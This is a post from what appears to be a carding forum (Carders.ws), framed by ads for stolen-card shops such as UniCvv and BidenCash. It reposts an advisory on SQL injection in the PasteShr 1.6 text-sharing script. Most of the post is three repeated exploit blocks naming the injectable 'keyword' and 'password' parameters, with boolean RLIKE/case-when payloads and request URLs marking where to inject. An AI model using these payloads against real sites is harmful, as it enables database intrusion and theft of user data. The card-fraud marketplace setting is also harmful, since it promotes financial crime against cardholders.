Ad End 1 February 2024
Ad Ends 13 January 2025
Ad End 26 February 2025
ad End 25 April 2025
Ad Ends 20 January 2025
Ad expire at 5 August 2024
banner Expire 25 April 2025
What's new
banner Expire 15 January 2025
banner Expire 20 October 2024
UniCvv
casino
swipe store
adv exp at 23 August 2024
Carding.pw carding forum
BidenCash Shop
Kfc CLub

PasteShr 1.6 SQL Injection From Carders.ws

File_closed07

TRUSTED VERIFIED SELLER
Staff member
Joined
Jun 13, 2020
Messages
7,545
Reaction score
916
Points
212
Awards
2
  • trusted user
  • Rich User



PasteShr version 1.6 suffers from multiple remote SQL injection vulnerabilities.

MD5 | 7a51baa5eca6c04a0eb42f1e84db549c

Download

Code:
===========================================================================================
# Exploit Title: PasteShr - SQL İnj.
# Dork: N/A
# Date: 14-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437
# Software Link:
https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html
# Version: v1.6
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Pasteshr is a script which allows you to store any
text online for easy sharing.
The idea behind the script is to make it more convenient for people to
share large amounts of text online.
===========================================================================================
# POC - SQLi
# Parameters : keyword
# Attack Pattern :
%27/**/RLIKE/**/(case/**/when/**//**/9494586=9494586/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'='
# GET Method : http://localhost/pasthr/public/search?keyword=4137548[SQL
Inject Here]
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: PasteShr - SQL İnj.
# Dork: N/A
# Date: 14-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437
# Software Link:
https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html
# Version: v1.6
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Pasteshr is a script which allows you to store any
text online for easy sharing.
The idea behind the script is to make it more convenient for people to
share large amounts of text online.
===========================================================================================
# POC - SQLi
# Parameters : password
# Attack Pattern :
/**/RLIKE/**/(case/**/when/**//**/6787556=6787556/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)
# POST Method :
http://localhost/pasthr/public/logi...aFAfeZfi2c&email=2270391&password=6195098[SQL
Inject Here]
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: PasteShr - SQL İnj.
# Dork: N/A
# Date: 14-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437
# Software Link:
https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html
# Version: v1.6
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Pasteshr is a script which allows you to store any
text online for easy sharing.
The idea behind the script is to make it more convenient for people to
share large amounts of text online.
===========================================================================================
# POC - SQLi
# Parameters : keyword
# Attack Pattern :
%27/**/RLIKE/**/(case/**/when/**//**/8266715=8266715/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'='
# POST Method :
http://localhost/pasthr/server.php/search?keyword=1901418[SQL Inject Here]
===========================================================================================
Click to expand...
 
Ad End 1 February 2024
Top